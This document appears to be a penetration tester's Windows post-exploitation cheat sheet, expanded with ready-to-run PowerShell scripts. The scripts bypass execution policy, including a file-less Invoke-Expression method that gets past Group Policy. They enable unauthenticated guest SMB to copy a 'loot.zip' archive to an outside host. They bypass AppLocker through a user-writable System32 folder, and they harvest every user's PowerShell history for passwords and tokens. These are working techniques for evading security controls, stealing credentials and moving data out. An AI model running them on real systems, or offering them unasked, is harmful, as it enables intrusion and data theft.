Windows
PowerShell's execution policy
PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. It exists to stop users from running scripts by accident, not to stop a determined user: Microsoft documents it as not being a security boundary, and it can be bypassed from the command line of an unprivileged account.
Start a PowerShell session with the execution policy bypassed:
C:\> powershell -ep bypass
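Added example, not from the original notes: it shows which scope is enforcing the policy and three equivalent ways of getting past it, including the one that still works when a Group Policy scope overrides the command-line switch. `$ScriptPath` is an assumed location.

```powershell
# Added example, not from the original notes: see which scope enforces the
# policy, then bypass it three different ways. $ScriptPath is an assumption.
$ScriptPath = 'C:\Users\Public\run.ps1'

# 1. Which scope is imposing the policy? MachinePolicy/UserPolicy come from
#    Group Policy and win over anything set by the user or on the command line.
Get-ExecutionPolicy -List

# 2. Process scope only: nothing is written to the registry, and this is what
#    "powershell -ep bypass" does (the value lands in $env:PSExecutionPolicyPreference).
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
Get-ExecutionPolicy            # Bypass, unless a GPO scope overrides it

# 3. Same thing for a fresh process that has to run a script file.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $ScriptPath

# 4. When a GPO scope overrides 2 and 3, feed the script text to the engine
#    instead of loading it as a file: the policy is only consulted for files.
Get-Content -Raw -Path $ScriptPath | Invoke-Expression
```

Step 4 is the one to remember on a domain-joined host with MachinePolicy set to AllSigned or Restricted; the policy never sees a file, so it has nothing to refuse.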
Registry
Edit key
To fix the following error, set AllowInsecureGuestAuth (REG_DWORD), located in HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters, to 1. This re-enables unauthenticated (guest) SMB access from the client, which Windows blocks by default since Windows 10 1709 and Windows Server 2019. If the "Enable insecure guest logons" Group Policy is configured, the same value under HKLM\SOFTWARE\Policies\Microsoft\Windows\LanmanWorkstation overrides this one. Where you control the share, putting credentials on it is the safer option, and either way set the value back to 0 when you are done.
PS C:\Users\Administrator> copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access. These
policies help protect your PC from unsafe or malicious devices on the network.
At line:1 char:1
+ copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-Item], IOException
+ FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand
You can set it from an elevated PowerShell session:
PS C:\Users\Administrator> Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' -Name 'AllowInsecureGuestAuth' -Value 1 -Type DWord
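Added example, not from the original notes: the full sequence of saving the current value, enabling guest auth, checking for a Group Policy override, copying the file, and restoring the previous state. The host, share and file name are the ones from the error above and are placeholders.

```powershell
# Added example, not from the original notes: flip AllowInsecureGuestAuth,
# verify it, copy the file, then restore the old value. Host, share and file
# name are taken from the error message above and are placeholders.
$Key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
$Name = 'AllowInsecureGuestAuth'
$Src  = '.\20220219102531_loot.zip'
$Dst  = '\\10.9.52.138\tmpshare\loot.zip'

# Remember the starting state; $null means the value is absent and the
# OS default (guest access blocked) applies.
$Old = (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name
Write-Host "Before: $Name = $Old"

# Needs an elevated prompt; HKLM\SYSTEM is not writable as a standard user.
Set-ItemProperty -Path $Key -Name $Name -Value 1 -Type DWord

# A Group Policy setting in the Policies hive wins over the one above;
# if it is set to 0 the copy will still fail.
$PolKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\LanmanWorkstation'
$Pol = (Get-ItemProperty -Path $PolKey -Name $Name -ErrorAction SilentlyContinue).$Name
if ($Pol -eq 0) { Write-Warning "GPO sets $Name=0 under $PolKey; this will still fail" }

try {
    Copy-Item -Path $Src -Destination $Dst -ErrorAction Stop
    Write-Host "Copied to $Dst"
} catch {
    # An SMB session that already exists does not re-negotiate; restart the
    # client service and retry once (this drops the host's current SMB client
    # connections, so do not do it on a box where that matters).
    Write-Warning "First attempt failed: $($_.Exception.Message)"
    Restart-Service -Name LanmanWorkstation -Force
    Copy-Item -Path $Src -Destination $Dst
} finally {
    # Do not leave the host willing to talk to unauthenticated shares.
    if ($null -eq $Old) {
        Remove-ItemProperty -Path $Key -Name $Name
    } else {
        Set-ItemProperty -Path $Key -Name $Name -Value $Old -Type DWord
    }
}
```

The restore step matters on a client engagement: leaving guest SMB enabled is exactly the weakness the default protects against, and a later report would need to explain why it was found on.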
Bypass AppLocker
If AppLocker is configured with only the default rules, we can bypass it by placing our executable in C:\Windows\System32\spool\drivers\color and running it from there. The bypass works because the default Exe rule allows everything under %WINDIR%, and that subfolder is one of the few under C:\Windows where unprivileged users may create files. Check both conditions before relying on it: a hardened policy usually adds explicit deny rules for the user-writable folders under C:\Windows, and a locked-down ACL on the folder defeats it just as well.
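Added example, not from the original notes: it checks the two conditions the bypass depends on (an allow rule covering %WINDIR% and a folder the current user can write to), then does a dry run with a copy of whoami.exe and asks AppLocker for its decision before executing. `$Drop` and `$Tool` are assumptions.

```powershell
# Added example, not from the original notes: verify both conditions the
# bypass needs, then prove it with a harmless binary. $Drop and $Tool are assumptions.
$Drop = 'C:\Windows\System32\spool\drivers\color'
$Tool = Join-Path $Drop 'w.exe'

# Condition 1: an Exe allow rule covering %WINDIR%. Dump the effective Exe
# path rules (Get-AppLockerPolicy -Effective merges local and domain policy).
[xml]$Xml = Get-AppLockerPolicy -Effective -Xml
$Exe = $Xml.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -eq 'Exe' }
"Exe collection enforcement: $($Exe.EnforcementMode)"
$Exe.FilePathRule | ForEach-Object {
    "{0,-5} {1}" -f $_.Action, $_.Conditions.FilePathCondition.Path
}
# The default rule this relies on shows up as:  Allow %WINDIR%\*
# A hardened policy adds Deny rules for the writable subfolders, e.g. this one.

# Condition 2: the folder must accept file creation from the current user.
icacls $Drop | Select-String 'Users|Authenticated'   # look for write/create grants (W, WD, AD)
try {
    $Probe = Join-Path $Drop "probe_$PID.tmp"
    New-Item -Path $Probe -ItemType File -ErrorAction Stop | Out-Null
    Remove-Item -Path $Probe
    "writable: $Drop"
} catch {
    "NOT writable: $Drop ($($_.Exception.Message))"
    return
}

# Dry run with a copy of whoami.exe, then ask AppLocker what it would decide
# for the current user before actually executing anything.
Copy-Item -Path "$env:windir\System32\whoami.exe" -Destination $Tool
Get-AppLockerPolicy -Effective |
    Test-AppLockerPolicy -Path $Tool -User "$env:USERDOMAIN\$env:USERNAME" |
    Select-Object FilePath, PolicyDecision, MatchingRule
& $Tool            # runs as the current user if PolicyDecision was Allowed
Remove-Item -Path $Tool
```

Test-AppLockerPolicy evaluates the rules exactly as the enforcement engine would, so a Denied decision here tells you the folder has been carved out and you need a different writable location under an allowed path.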
PowerShell history
- ConsoleHost_history.txt (written by PSReadLine for the console host, one file per user; the ISE and hosts without PSReadLine do not write it):
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
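Added example, not from the original notes: it asks PSReadLine where the current user's history really lives (the path can be relocated), then walks every profile on the box for the default file and pulls out lines worth a second look. The keyword list is an assumption; reading other users' profiles needs local admin.

```powershell
# Added example, not from the original notes: collect PSReadLine history for
# every profile on the box. The keyword pattern is an assumption; adjust it.

# Current user: ask PSReadLine where it actually writes, since the path can be
# moved with Set-PSReadLineOption -HistorySavePath.
(Get-PSReadLineOption).HistorySavePath

# All profiles at the default location (needs local admin for other users).
$Rel = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
$Pattern = 'password|passwd|pass |cred|secure|key|token|net use|Invoke-WebRequest|IEX|Invoke-Expression'
Get-ChildItem -Path 'C:\Users' -Directory | ForEach-Object {
    $Hist = Join-Path $_.FullName $Rel
    if (Test-Path -Path $Hist) {
        "==== $($_.Name) ($((Get-Item $Hist).Length) bytes) ===="
        # Select-String is case-insensitive by default, so one pattern covers
        # the usual capitalisation variants.
        Select-String -Path $Hist -Pattern $Pattern |
            ForEach-Object { "{0,5}: {1}" -f $_.LineNumber, $_.Line }
    }
}
```

Recent PSReadLine versions skip saving lines that match their own sensitive-keyword filter, and a user can disable saving entirely with Set-PSReadLineOption -HistorySaveStyle SaveNothing, so an empty or missing file does not prove that nothing was typed.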